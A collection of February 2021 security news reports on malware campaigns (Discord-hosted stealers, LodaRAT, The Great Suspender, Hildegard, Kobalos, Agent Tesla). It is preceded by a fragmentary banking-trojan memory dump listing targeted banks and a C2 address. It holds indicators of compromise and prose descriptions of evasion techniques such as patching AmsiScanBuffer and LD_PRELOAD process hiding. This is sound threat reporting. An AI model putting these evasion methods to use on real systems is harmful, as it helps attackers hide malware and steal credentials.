ClienteRecebeu====> <br />0x4e7e500 (44): Erro Encontrado====> 0x4e71f98 (28):
banco montepio 0x4e71fc4 (16): montepio 0x4e71ff8 (26): millenniumbcp 0x4e72034
(18): Santander 0x4e72054 (14): BPI Net 0x4e72070 (18): Banco BPI 0x4e720a4
(24): Caixadirecta 0x4e720cc (42): Caixadirecta Empresas 0x4e72118 (20): NOVO
BANCO 0x4e72150 (14): EuroBic 0x4e72186 (16): Credito Agricola 0x4e721b0 (20):
Login Page 0x4e721d4 (22): CA Empresas 0x4e7220c (18): Bankinter 0x4e72240 (38):
navegador exclusivo 0x4e74abc (14): TravaBB 0x4e74ada (32): Banco do Brasil
0x4e74b08 (16): Traazure 0x4e74b2a (32): Caixa Economica 0x4e74b58 (20):
Travsantos 0x4e74b7e (20): Santander 0x4e74ba0 (14): Travsic 0x4e74bbe (14):
Sicred 0x4e74bdc (14): Travite 0x4e74bfa (8): Ita 0x4e74c14 (18): Travdesco
0x4e74c36 (18): Bradesco 0x4e74c58 (22): BANRITRAVAR 0x4e74c7e (18): Banrisul
0x4e74ca0 (20): TravaBitco 0x4e74cc6 (32): Mercado Bitcoin 0x4e74cf4 (14):
Travcit 0x4e74d12 (18): Citibank 0x4e74d34 (18): Travorigs 0x4e74d56 (30): Banco
Original 0x4e74d84 (18): SICTRAVAR 0x4e74da6 (14): Sicoob
Communication
process
0x64d637c (246): <|Info|><|>Microsoft Windows 10 Home
(64)bit<|><|><|><<|@-@|DESKTOP-xxxxxxxxx - xxxx|Microsoft Windows 10 Home
(64)bit|||MP|N
0x64d6474 (108):
O|210X|..|FF|############00000000|5.188.9.28|||@-@
0x64d64fc (360):
##35977722363232BA77922081E8A8B11D252207F6A##############173E26057E4840ABCD03FFE2D3BAC479123CA9C6159D7E881145B3DBA246D411F2B##
0x64d667c (364):
##35977722363232BA77922081E8A8B11D252207F###############A0053CCA9187D90E173E26057E4840ABCD03FFE2D3BAC479123CA9C6159D7E881145B3DBA246D411F2BD5##
0x64dc5cc (264):
##35977722363232BA77922081E8A8B11D252207F############90E173E26057E4840ABCD0##
0x64dc6ec (260):
44A46F92B11004144D5DFA2DF86AAF66###############C8690B55C83A03225F22BBC12B17BDD3AD94E
C2 server geolocated in Russia
C2: 5.188.9.]28
Banking overlay windows
Indicators of Compromise are available in the original report:
Various Malware Lurks in Discord App to Target Gamers
11.2.2021
Virus
Threatpost
Research from Zscaler ThreatLabZ shows attackers using spam emails and legitimate-looking links to gaming software to serve up Epsilon ransomware, the XMRrig cryptominer and various data and token stealers.
A rise in online gaming, tied to pandemic-mandated social distancing, has led to a spike in criminals targeting the demographic. The latest effort to exploit the trend is malicious files planted inside the Discord platform designed to trick users into downloading malware-laced files.
Researchers report multiple active campaigns targeting the Discord “cdn[.]discordapp[.]com” service designed to trigger an infection chain and serve-up the Epsilon ransomware, the data-stealer Trojans and the XMRrig cryptominer, according to a report by Zscaler ThreatLabZ. Attackers also are using the service for command-and-control (C2) communication, researchers observed.
Discord group-chatting platform originally built for gamers and has evolved to become a virtual watering hole for socializing. The app is used by gamers and alike for creating communities on the web, called “servers,” either as standalone forums or as part of another website. Discord supports voice, video, or text – allowing all to interact within created communities.
COVID-19 Safe, But Malware Laced Environment
Discord–like myriad other chat
and online communication platforms–has seen an uptick in use. This has put a
bullseye on Discord and other virtualized communities by hackers who see them as
ripe targets for abuse.
“During 2020, research showed a sharp increase in game downloads, and this activity did not go unnoticed by cybercriminals,” according to the ThreatLabZ. “Attackers have often exploited the popularity of certain games (Among Us was a recent example) to lure players into downloading fake versions that served malware.”
While planting malware in Discord is not a new activity, researchers discovered a number of novel campaigns using various known malware to lure gamers from within the platform.
Malware Cornucopia
Malware found being planted recently in Discord includes
not only Epsilon ransomware, but also the XMRig miner and three types of
stealers—Redline Stealer, TroubleGrabber and a broad category of unidentified
Discord token grabbers, according to ThreatLabZ.
The new Discord attacks observed by researchers usually start with spam emails in which users are tricked with legitimate-looking templates into downloading next-stage payloads. The attack vector uses Discord services to form a URL to host a malicious payload as https://cdn[.]discordapp[.]com/attachments/ChannelID/AttachmentID/filename[.]exe
The campaigns rename malicious files as pirated software or gaming software as well as use file icons related to gaming to trick victims, according to the report.
Researchers investigated the attack vectors of the different types of malware detected in the latest Discord campaigns, which each have their own methods.
Key Findings
Multiple campaigns relying on the cdn[.]discordapp[.]com service
for their infection chain.
Cybercriminals are using Discord CDN to host
malicious files as well as for command-and-control communication.
Malicious
files are renamed as pirated software or gaming software to trick gamers.
File icons are also related to gaming software to trick gamers.
Multiple
categories of malware are being served through the Discord app’s CDN
infrastructure – ransomware, stealers, and cryptominers.
Different Malware
Strokes, For Different Folks
In the case of the Epsilon ransomware, execution
starts with dropping an .inf file and .exe file in the Windows/Temp folder of
the user’s machine. The malware establishes persistence by creating a registry
key on the victim’s machine and then enumerating through the the system drives
to encrypt the files using double encryption–including a randomly generated
32-bit key and custom RC4 encryption that has a 2048-bit variable-length key.
Once encryption is established, the attack downloads the ransom note image from the cdn.discordapp.com link to show on the victim’s machine, researchers noted. However, unlike the stealers and cryptominer observed in the new campaigns, Epsilon does not use Discord to initiate C2 communication.
The Redline stealer–a new-ish Russian malware that’s been available on underground forums since last year—starts its attack by dropping a copy of itself into the AppData/Roaming folder of a victim’s machine. The stealer makes use of several popular gaming app names to perform its activities, which include collecting login and passwords, cookies, autocomplete fields and credit cards, as well as stealing data from FTP and IM clients, researchers said.
The XMRig miner initiates its attack by dropping a copy of itself at %ProgramData%\RealtekHDUpdater\realtekdrv[.]exe. and then changes the system’s file permissions without user consent as well as connects to the C2 server with various commands.
What Threat Actors are After
After trying to delete a slew of programs on
the victim’s machine—including Process Hacker, Task Manager, Windows, Windows
Task Manager, AnVir Task Manager, Taskmgr[.]exe and NVIDIA GeForce—the miner
launches using the Monero address
“4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQswVtyKcWBsLoeY6A2.”
The other grabbers observed by researchers use Discord tokens to steal user information, a type of malicious activity that researchers at Sonatype also observed targeting Discord last month using the CursedGrabber malware.
Discord tokens are used inside bot code to send commands back and forth to the Discord API, which in turn controls bot actions. If a Discord token is stolen, it would allow an attacker to hack the server.
Researchers observed the TroubleGrabber performing token stealing in the latest campaigns as well as other various unidentified grabbers engaging in similar activity, they said.
LodaRAT Windows Malware Now Also Targets Android Devices
11.2.2021
Virus
Thehackernews
A previously known Windows remote access Trojan (RAT) with credential-stealing capabilities has now expanded its scope to set its sights on users of Android devices to further the attacker's espionage motives.
"The developers of LodaRAT have added Android as a targeted platform," Cisco Talos researchers said in a Tuesday analysis. "A new iteration of LodaRAT for Windows has been identified with improved sound recording capabilities."
Kasablanca, the group behind the malware, is said to have deployed the new RAT in an ongoing hybrid campaign targeting Bangladeshi users, the researchers noted.
The reason why Bangladesh-based organizations have been specifically singled out for this campaign remains unclear, as is the identity of the threat actor.
First documented in May 2017 by Proofpoint, Loda is an AutoIt malware typically
delivered via phishing lures that's equipped to run a wide range of commands
designed to record audio, video, and capture other sensitive information, with
recent variants aimed at stealing passwords and cookies from browsers.
The latest versions — dubbed Loda4Android and Loda4Windows — are a lot alike in that they come with a full set of data-gathering features that constitute a stalker application. However, the Android malware is also different, as it particularly avoids techniques often used by banking Trojans, like abusing Accessibility APIs to record on-screen activities.
Besides sharing the same command-and-control (C2) infrastructure for both Android and Windows, the attacks, which originated in October 2020, have targeted banks and carrier-grade voice-over-IP software vendors, with clues pointing to the malware author being based in Morocco.
The attackers also made of a myriad number of social engineering tricks, ranging
from typo squatted domains to malicious RTF documents embedded in emails, that,
when opened, triggered an infection chain that leverages a memory corruption
vulnerability in Microsoft Office (CVE-2017-11882) to download the final
payload.
While the Android version of the malware can take photos and screenshots, read SMS and call logs, send SMS and perform calls to specific numbers, and intercept SMS messages or phone calls, its latest Windows counterpart comes with new commands that enable remote access to the target machine via Remote Desktop Protocol (RDP) and "Sound" command that makes use of BASS audio library to capture audio from a connected microphone.
"The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving," said researchers with Cisco Talos.
"Along with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss."
Watch out! ‘The Great Suspender’ Chrome extension contains Malware
7.2.2021
Virus
Thehackernews
Google removed the popular The Great Suspender from the official Chrome Web
Store for containing malware and deactivated it from the users’ PC.
Google on
Thursday removed The Great Suspender extension from the Chrome Web Store.
Million of users have installed the popular Chrome extension, the IT giant also
took the proactive measure of deactivating it from users’ computers.
The extension had more than two million installs before it was removed from the Chrome store. The extension was used to suspend tabs that aren’t in use with the intent of saving resource. The extension replaces the suspended pages with a blank page until the users decide to use it again.
“This extension contains malware,” read the notification published by Google.
Experts discovered that a new maintainer of the extensions has secretly added a
feature that could be exploited to remotely execute arbitrary code.
The malicious code could be exploited to carry out malicious activities, such as committing advertising fraud.
“The old maintainer appears to have sold the extension to parties unknown, who
have malicious intent to exploit the users of this extension in advertising
fraud, tracking, and more. In v7.1.8 of the extension (published to the web
store but NOT to GitHub), arbitrary code was executed from a remote server,
which appeared to be used to commit a variety of tracking and fraud actions.
After Microsoft removed it from Edge for malware, v7.1.9 was created without
this code: that has been the code running since November, and it does not appear
to load the compromised script. The malicious maintainer remains in control,
however, and can introduce an update at any time. Well, they could until Google
nuked the extension from their store.” reads a post published by Calum McConnell
on GitHub. “The Great Suspender has been removed from the Chrome Web Store.”
Microsoft blocked The Great Suspender extension since November for the presence
of malicious code.
The extension’s original creator Dean Oemcke sold the extension in June 2020 to an unidentified party, since then the new maintainer uploaded two new versions on the Chrome store, 7.1.8 and 7.1.9.
If you have lost tabs due to the extension being removed read the following
post:
“The extension comes with its own tab history management UI to help
users recover from lost tabs. Go to the extension options page (from ‘settings’
in the popup or ‘options’ when right-clicking on the extension). Then in the
settings sidebar click on ‘Session management’. This will show you your most
recent tab sessions. You can click on each session to see more detail on the
individual windows and tabs it contains. To reload a session, simply click the
‘reload’ link. This will reload all windows and tabs in an ‘unsuspended’ state.
If your session contains a very large number of tabs, then you might instead
want to click ‘resuspend’ which will be much faster as it reloads the tabs in a
suspended state.”
WARNING — Hugely Popular 'The Great Suspender' Chrome Extension Contains Malware
7.2.2021
Virus
Thehackernews
Google on Thursday removed The Great Suspender, a popular Chrome extension used by millions of users, from its Chrome Web Store for containing malware. It also took the unusual step of deactivating it from users' computers.
"This extension contains malware," read a terse notification from Google, but it has since emerged that the add-on stealthily added features that could be exploited to execute arbitrary code from a remote server, including tracking users online and committing advertising fraud.
"The old maintainer appears to have sold the extension to parties unknown, who have malicious intent to exploit the users of this extension in advertising fraud, tracking, and more," Calum McConnell said in a GitHub post.
The extension, which had more than two million installs before it was disabled, would suspend tabs that aren't in use, replacing them with a blank gray screen until they were reloaded upon returning to the tabs in question.
Signs of the extension's shady behavior had been going the rounds since November, leading Microsoft to block the extension (v7.1.8) on Edge browsers last November.
According to The Register, Dean Oemcke, the extension's original developer, is said to have sold the extension in June 2020 to an unknown entity, following which two new versions were released directly to users via the Chrome Web Store (7.1.8 and 7.1.9).
Users of the extension can recover the tabs using a workaround here, or as an alternative, can also use the latest version available on GitHub (v7.1.6) by enabling Chrome Developer mode.
But turning on the Developer mode can have other consequences, too, as revealed by security researcher Bojan Zdrnja, who disclosed a novel method that lets threat actors abuse the Chrome sync feature to bypass firewalls and establish connections to attacker-controlled servers for data exfiltration.
Zdrnja said the adversary created a malicious security add-on that masqueraded as Forcepoint Endpoint Chrome Extension for Windows, which was then installed directly on the browser after enabling Developer mode.
"While there are some limitations on size of data and amount of requests, this is actually perfect for C&C commands (which are generally small), or for stealing small, but sensitive data – such as authentication tokens," Zdrnja said.
But given that this attack requires physical access to a target system, it is unlikely to be resolved by Google.
New 'Hildegard' Malware Targets Kubernetes Systems
5.2.2021
Virus
Securityweek
The hacking group referred to as TeamTNT has been employing a new piece of malware in a recently started campaign targeting Kubernetes environments, security researchers with Palo Alto Networks’ Unit 42 reveal.
During the summer of 2020, TeamTNT was targeting Docker and Kubernetes systems with a crypto-mining worm capable of stealing local credentials, including Amazon Web Services (AWS) login details.
In a different campaign that was detailed in September 2020, the threat actor was employing a legitimate open source tool named Weave Scope to fingerprint targeted cloud environments and execute commands.
In a brand new campaign that started in January 2021, but which appears to be only in its early stages, the hacking group has targeted Kubernetes environments with a piece of malware called Hildegard, which is both stealthy and persistent.
The malware establishes a connection with its command and control (C&C) server via a tmate reverse shell and an Internet Relay Chat (IRC) channel, disguises the malicious process using the bioset Linux process, hides malicious processes using library injection, and encrypts the malicious payload to hinder analysis.
As part of the observed attacks, once the Kubernetes cluster was compromised, the hackers attempted to spread to additional containers, with the final purpose of the attacks being cryptojacking. However, no new activity has been identified since the initial detection.
The campaign employs tools and domains observed in previous TeamTNT attacks, but the code base and infrastructure appear incomplete, suggesting that the campaign is still under development. Most of the infrastructure is only one month old and some scripts are being frequently updated.
“Knowing this malware’s capabilities and target environments, we have good reason to believe that the group will soon launch a larger-scale attack,” Palo Alto Networks’ researchers say.
In addition to abusing the processing power of Kubernetes clusters for cryptojacking, the malware might also be leveraged for the exfiltration of sensitive data from the applications running in the targeted environments.
Leveraging the reverse shell, the attackers can also manually perform additional reconnaissance and operations.
The Hildegard malware gathers various types of information on the host and also searches for credentials on the host, including cloud access keys and tokens, SSH keys, Docker credentials, and Kubernetes service tokens. All credentials files discovered are sent to the C&C.
“This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C&C,” Palo Alto Networks concludes.
In an emailed comment to SecurityWeek, Tal Morgenstern, co-founder and CPO at vulnerability management firm Vulcan Cyber, pointed out the importance of ensuring that all assets are properly secured, given the nature of this attack.
“In this complex attack, threat actors are leveraging a combination of Kubernetes misconfigurations and known vulnerabilities. DevOps and IT teams must closely coordinate with their counterparts in security to prioritize remediation especially for external-facing assets and high-risk vulnerabilities. It is very possible to quickly secure Kubernetes. The remedies are available, but it takes work, focus and cross-team collaboration to get fix done and prevent these kinds of attacks,” Morgenstern said.
New Malware Hijacks Kubernetes Clusters to Mine Monero
4.2.2021
Virus
Threatpost
Researchers warn that
the Hildegard malware is part of ‘one of the most complicated attacks targeting
Kubernetes.’
Researchers have discovered never-before-seen malware, dubbed Hildegard, that is being used by the TeamTNT threat group to target Kubernetes clusters.
While Hildegard, initially detected in January 2021, is initially being used to launch cryptojacking operations, researchers believe that the campaign may still be in the reconnaissance and weaponization stage. Eventually, they warn, TeamTNT may launch a more large-scale cryptojacking attack via Kubernetes environments or steal data from applications running in Kubernetes clusters.
“We believe that this new malware campaign is still under development due to its seemingly incomplete codebase and infrastructure,” said Jay Chen, Aviv Sasson and Ariel Zelivansky, researchers with Palo Alto Networks, on Wednesday. “At the time of writing, most of Hildegard’s infrastructure has been only online for a month.”
The Campaign
Attackers first gained initial access by targeting a
misconfigured kubelet with a remote code execution attack that gave them
anonymous access.
The kubelet maintains a set of pods on a local system; within a Kubernetes cluster, the kubelet functions as a local agent that watches for pod specs via the Kubernetes API server.
Once getting a foothold into a Kubernetes cluster in this way, the attacker downloaded tmate and issued a command to run it in order to establish a reverse shell to tmate.io. Tmate is a software application that provides provides a secure terminal sharing solution over an SSH connection.
The attack process. Credit: Palo Alto Networks
Then the attacker used the masscan Internet port scanner to scan Kubernetes’s internal network and find other unsecured kubelets. They then attempted to deploy a malicious cryptomining script (xmr.sh) to containers managed by these kubelets. Researchers said that from these cryptojacking operations, attackers have collected 11 XMR (~$1,500) in their wallet.
TeamTNT has previously targeted unsecured Docker daemons in order to deploy malicious container images. Researchers noted that these Docker engines run on a single host. On the other hand, the Kubernetes clusters, which are the set of nodes that run containerized applications, typically contain more than one host – with every host running multiple containers.
This means that attackers can work with a more abundant set of resources in a Kubernetes infrastructure – meaning a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host, they said.
“The most significant impact of the malware is resource hijacking and denial of service (DoS),” said researchers. “The cryptojacking operation can quickly drain the entire system’s resources and disrupt every application in the cluster.”
Malware Capabilities
While the malware utilizes many of the same tools and
domains identified in TeamTNT’s previous campaigns, it also harbors multiple new
capabilities that make it more stealthy and persistent, said researchers.
For one, the malware relies on two disparate ways to establish command and control (C2) connections: the tmate reverse shell, as well as an Internet Relay Chat (IRC) channel.
“It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose,” said researchers.
Hildegard also uses various detection evasion tactics that researchers have not previously associated with TeamTNT. For example, the malware mimics a known Linux process name (bioset) to disguise its malicious IRC communications.
It also uses a library injection technique based on LD_PRELOAD to hide its malicious processes: “The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions,” explained researchers, “This way, when applications try to identify the running processes (by reading files under /proc) in the containers, tmate, xmrig … will not be found.”
Finally, the malware encrypts its malicious payload inside a binary to make the automated static analysis more difficult.
TeamTNT
The new malware is only the latest change from the TeamTNT cybercrime
group, which is known for cloud-based attacks, including targeting Amazon Web
Services (AWS) credentials in order to break into the cloud and use it to mine
for the Monero cryptocurrency.
Last week, researchers found that the group had added a new detection-evasion tool to its arsenal, helping its cryptomining malware skirt by defense teams. From time to time, TeamTNT has also been seen deploying various updates to its cryptomining malware. In August, TeamTNT’s cryptomining worm was discovered spreading through the AWS cloud and collecting credentials. Then, after a hiatus, the TeamTNT group returned in September to attack Docker and Kubernetes cloud instances by abusing a legitimate cloud-monitoring tool called Weave Scope.
Researchers noted that while the malware is still under development and the campaign is not yet widespread, they believe the attacker will soon mature its tools and start a large-scale deployment.
“This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes,” said researchers. “This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. These efforts make the malware more stealthy and persistent.”
A New Linux Malware Targeting High-Performance Computing Clusters
4.2.2021
Virus
Thehackernews
High-performance
computing clusters belonging to university networks as well as servers
associated with government agencies, endpoint security vendors, and internet
service providers have been targeted by a newly discovered backdoor that gives
attackers the ability to execute arbitrary commands on the systems remotely.
Cybersecurity firm ESET named the malware "Kobalos" — a nod to a "mischievous creature" of the same name from Greek mythology — for its "tiny code size and many tricks."
"Kobalos is a generic backdoor in the sense that it contains broad commands that don't reveal the intent of the attackers," researchers Marc-Etienne M. Léveillé and Ignacio Sanmillan said in a Tuesday analysis. "In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers."
password auditor
Besides tracing the malware back to attacks against a number
of high-profile targets, ESET said the malware is capable of taking aim at
Linux, FreeBSD, Solaris, and possibly AIX and Windows machines, with code
references hinting at Windows 3.11 and Windows 95 legacy operating systems.
Kobalos infections are believed to have started in late 2019 and have since continued to remain active throughout 2020.
The initial compromise vector used to deploy the malware and the ultimate objective of the threat actor remains unclear as yet, but the presence of a trojanized OpenSSH client in one of the compromised systems alludes to the possibility that "credential stealing could be one of the ways Kobalos propagates."
No other malware artifacts were found on the systems, nor have there been any
evidence that could potentially reveal the attackers' intent.
"We have not found any clues to indicate whether they steal confidential information, pursue monetary gain, or are after something else," the researchers said.
But what they did uncover shows the multi-platform malware harbors some unusual techniques, including features that could turn any compromised server into a command-and-control (C&C) server for other hosts compromised by Kobalos.
In other words, infected machines can be used as proxies that connect to other compromised servers, which can then be leveraged by the operators to create new Kobalos samples that use this new C&C server to create a proxy chain comprising of multiple infected servers to reach their targets.
To maintain stealth, Kobalos authenticates connections with infected machines using a 32-byte password that's generated and then encrypted with a 512-bit RSA private key. Subsequently, a set of RC4 keys are used — one each for inbound traffic and outbound traffic — for communications with the C&C server.
The backdoor also leverages a complex obfuscation mechanism to thwart forensic analysis by recursively calling the code to perform a wide range of subtasks.
"The numerous well-implemented features and the network evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems," the researchers said.
"Their targets, being quite high-profile, also show that the objective of the Kobalos operators isn't to compromise as many systems as possible. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our Internet-wide scan."
Tiny Kobalos Malware Bedevils Supercomputers to Steal Logins
3.2.2021
Virus
Threatpost
The sophisticated backdoor steals SSH credentials for servers in academic and scientific high-performance computing clusters.
A tiny-sized malware that packs a big punch has been targeting supercomputers, especially those used in academia and scientific enterprises. It allows initial access for a variety of follow-on attacks, including credential theft – and potentially data exfiltration or cryptomining.
That’s according to ESET researchers, who discovered the Kobalos backdoor in recent months. The code grants remote access to the file system, allows attackers to create terminal sessions and allows proxying connections to other Kobalos-infected servers.
“Kobalos malware contains generic commands to read from and write to the file system and spawn a terminal to execute arbitrary commands,” they explained. “Unfortunately, it doesn’t contain any specific payload that could indicate the intentions of its authors. The operators likely open a shell through the terminal and perform whatever commands they need to.”
Kobalos, Mischievous Sprite
Kobalos gets its name from Greek mythology. The
kobaloi were companions of Dionysus, a band of mischievous sprites known for
tricking and frightening mortals. ESET researchers adopted the name for the
malware due to “for its tiny code size and many tricks,” they said in an
analysis issued Tuesday.
The backdoor is multiplatform and capable of attacking Linux, BSD, Solaris, and possibly AIX and Windows machines, researchers said (they found strings related to Windows 3.11 and Windows 95, which are 25-year-old operating systems).
So far, it’s been seen going after high performance computing (HPC) clusters; but also was seen infecting a large Asian ISP, a North American endpoint security vendor and a handful of personal servers.
ESET identified Kobalos victims by scanning for connections to SSH servers that use a specific TCP source port known to be abused by the malware.
“There are multiple ways for the operators to reach a Kobalos-infected machine,” according to ESET. “The method we’ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port.”
However, there are other standalone variants that are not embedded in sshd; these either connect to a command-and-control server (C2) that will act as a middleman, or it will wait for an inbound connection on a given TCP port, the firm noted.
Initial Compromise
ESET researchers are unsure how the infected systems were
compromised to gain administrative access to install the Kobalos backdoor, but
an obvious possible entry point could be exploitation of a known vulnerability.
“Some of the compromised machines ran old, unsupported or unpatched operating systems and software,” they explained. “While the use of an undisclosed vulnerability isn’t impossible, a known exploit is more likely in this situation.”
Kobalos also is likely using stolen credentials – ESET observed that in systems compromised by Kobalos, any SSH client in use has credentials stolen using a second-stage malware. This SSH credential stealer took the form of a trojanized OpenSSH client.
“The /usr/bin/ssh file was replaced with a modified executable that recorded username, password and target hostname, and wrote them to an encrypted file,” ESET researchers explained. Those stolen credentials can simply be used by the attackers to install Kobalos on the newly discovered server later.
Thus, to avoid becoming a victim, administrators should make sure patches are up-to-date and they should set up two-factor authentication (2FA) for connecting to SSH servers, researchers noted: “Kobalos is another case where 2FA could have mitigated the threat, since the use of stolen credentials seems to be one of the ways it is able to propagate to different systems.”
A Self-Contained Malware Ecosystem
The C2 server approach in Kobalos is
notable, according to the analysis – because it has the C2 code embedded within
itself.
“Any server compromised by Kobalos can be turned into a C2 server by the operators sending a single command,” researchers explained. “As the C2 server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C2 server.”
Kobalos also can be used as a proxy to connect other infected servers.
Main Kobalos features (click to enlarge). Source: ESET.
“It is not a generic TCP proxy; it expects communication to be encapsulated in packets specific to this threat. [Also] a command can be sent to the proxy to ‘switch’ the connection to a new TCP port. Proxies can be chained, which means the operators can use multiple Kobalos-compromised machines to reach their targets.”
Interestingly, of the Kobalos code is tightly contained in a single function, which “recursively calls itself to perform subtasks,” according to the analysis.
This compact architecture combines with other malware attributes to defy analysis. For instance, ESET pointed out that Kobalos’ usage of an existing open port makes the threat harder to find. And, all strings are encrypted, “so it’s more difficult to find the malicious code than when looking at the samples statically,” the report noted.
To that end, using the backdoor requires a private 512-bit RSA key and a 32-byte-long password. Once both are validated, Kobalos generates and encrypts two 16-byte keys with the RSA-512 public key and sends them to the attackers. These two keys are used to RC4 encrypt subsequent inbound and outbound traffic.
Overall, the Kobalos authors are clearly advanced attackers, ESET surmised.
“Numerous well-implemented features and the network-evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems,” according to the report. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our internet-wide scan.”
SSH Client Credential Theft
The credential stealer mentioned earlier is
unique, researchers said, and unlike any of the malicious OpenSSH clients the
team has analyzed in the past.
Different variants were found, including Linux and FreeBSD instances. In all cases, the main capabilities consist of stealing hostname, port, username and password used to establish an SSH connection from the compromised host, which are saved in an encrypted file.
“All samples found use the same simple cipher for the contents of the files; it simply adds 123 to each byte of data to be saved,” researchers explained. “For the FreeBSD version, the same format and cipher is applied. However, there are some small implementation differences, such as encrypting the file path in the malware with a single-byte XOR.”
The location of the file where the stolen SSH credentials are saved varies depending on the variant, but all samples create a file under /var/run with a legitimate-looking “.pid” extension.
Newer versions of the credential-stealer contain an encrypted configuration and adds the functionality to exfiltrate credentials over UDP to a remote host specified in the configuration.
“Exfiltrating credentials over UDP is something Ebury and other SSH credential stealers such as Bonadan, Kessel and Chandrila have been doing,” the analysis read. “The choice of UDP could be to bypass a firewall and avoid creating TCP network flow to potentially untrusted hosts.”
The malware’s configuration includes the hostname of the victim and a specified file path for exfiltration, so that the cyberattackers can track the origin of the credentials. “This also means that each compromised server receives a unique sample of the credential stealer,” researchers added.
Interestingly, the code lacks the sophistication of Kobalos itself, according to ESET.
“For example, strings were left unencrypted, and stolen usernames and passwords are simply written to a file on disk,” researchers wrote. “However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network.”
Supercomputer Cyberattacks
Attacks on HPCs have become more common in the
last 12 months.
An advisory from the European Grid Infrastructure (EGI) CSIRT last year warned that supercomputing clusters in Canada, China and Poland had been compromised to deploy cryptocurrency miners.
And meanwhile, the U.K. supercomputer known as ARCHER was compromised in May last year to steal SSH credentials.
It’s unclear if Kobalos was working its mischief in these attacks; the CERN Computer Security Team responsible for mitigating attacks on scientific research networks did say that Kobalos’ existence predates the incidents, but ESET found that the techniques described in the cryptomining attacks in particular were different from the Kobalos efforts.
Nonetheless, Kobalos has a clear interest in supercomputing, and these high-profile targets, show that the objective of the Kobalos operators isn’t to compromise as many systems as possible, researchers noted.
“It is not clear why the HPC community is overly represented among the victims of these attacks,” according to the report. “HPC centers are obviously interesting targets but typically less easily accessible than other academic servers.”
That said, “CERN and other incident response teams [have] observed a number of legacy designs and suboptimal security practices that played a key role in enabling the attackers to spread their attacks. Additionally, most HPC victims were poorly prepared for forensics, in particular with regard to traceability.”
The credential-stealing aspect of Kobalos could also explain why many academic networks were compromised, they added: “If one of those system’s SSH clients was used by students or researchers from multiple universities, it could have leaked credentials to all these third-party systems.”
Agent Tesla Trojan ‘Kneecaps’ Microsoft’s Anti-Malware Interface
3.2.2021
Virus
Threatpost
A new version of the Agent Tesla RAT can ‘kneecap’ endpoint protection software supported by Microsoft ASMI.
Researchers have identified new versions of the Agent Tesla remote access trojan (RAT) that target the Windows anti-malware interface used by security vendors to protect PCs from attacks. The newly discovered variants have also adopted new obfuscation capabilities, raising the stakes for businesses to fend off the ever-evolving Agent Tesla malware.
Chief among the update is that the malware now targets Microsoft’s anti-malware software interface (ASMI) in order to avoid detection. ASMI allows applications and services to integrate with any antimalware product that’s present on a machine. The malware also now has the added capability of deploying a Tor client to conceal its communications, as well as using the Telegram chat application to exfiltrate data.
All of these changes make both sandbox and static analysis and endpoint detection of the malware more difficult, warned researchers.
“Agent Tesla remains a consistent threat—for many months, it has remained among the top families of malware in malicious attachments caught by Sophos,” said Sophos researchers on Tuesday. “Because of this sustained stream of Agent Tesla attacks, we believe that the malware will continue to be updated and modified by its developers to evade endpoint and email protection tools.”
Agent Tesla first came into the scene in 2014, specializing in keylogging (designed to record keystrokes made by a user in order to exfiltrate data like credentials and more) and data-stealing. Agent Tesla has historically arrived in a malicious spam email as an attachment.
The first stage of the malware’s newer version includes a .NET-based downloader. The downloader collects obfuscated code from websites like Pastebin and Hastebin (which touts itself as an “open source alternative to Pastebin”). This is not a new tactic, with Agent Tesla previously turning to a legitimate Pastebin-like web service for downloading malware.
Credit: Sophos
Then, Agent Tesla’s installer attempts to overwrite code in Microsoft’s AMSI. First, the downloader attempts to get the memory address of AmsiScanBuffer (Microsoft’s function, also known as amsi.h, that scans a buffer-full of content for malware).
It does so by calling Windows’ amsi.dll, using the Windows LoadLibraryA function, to get the DLL’s base address. Then it uses the GetProcAddress function to retrieve the base address and the “AmsiScanBuffer” procedure name to get the address of the function.
Once Agent Tesla gets the address of AmsiScanBuffer, it patches the first 8 bytes of the function in memory. This forces AMSI to return an error (code 0x80070057), making all the AMSI scans of memory appear to be invalid, according to researchers.
“This kneecaps AMSI-enabled endpoint protection software, by essentially making them skip further AMSI scans for dynamically loaded assemblies within the Agent Tesla process,” said researchers. “Since this happens early in the first stage downloader’s execution, it renders any AMSI protection against the subsequent components of the downloader, the second-stage loader, and the Agent Tesla payload itself.”
The new version of Agent Tesla also has the added capabilities of deploying a Tor client. This free, open-source software enables anonymous communication – serving as a tool for Agent Tesla to conceal its communications, said researchers.
“If selected in the configuration file, the malware downloads and installs a Tor client from the official Tor site,” said researchers. If the Tor client is already present, it kills the process before installing the new one, and writes a torrc configuration file from encrypted strings hardcoded into the malware.”
New Features
Researchers said the functionality of these two new variants is
widely the same, but now include updates to the data that is captured, and how
it is exfiltrated.
In the new Agent Telsa version, the developers can now capture data from the Windows clipboard. The Windows clipboard is a storage area for items the have been cut or copied; this data could include anything from sensitive copied data from emails or documents, to passwords. This data is then sent back to the command-and-control (C2) server.
Another difference is that in the new version of Agent Tesla, the number of applications targeted for credential harvesting “has been expanded considerably.”
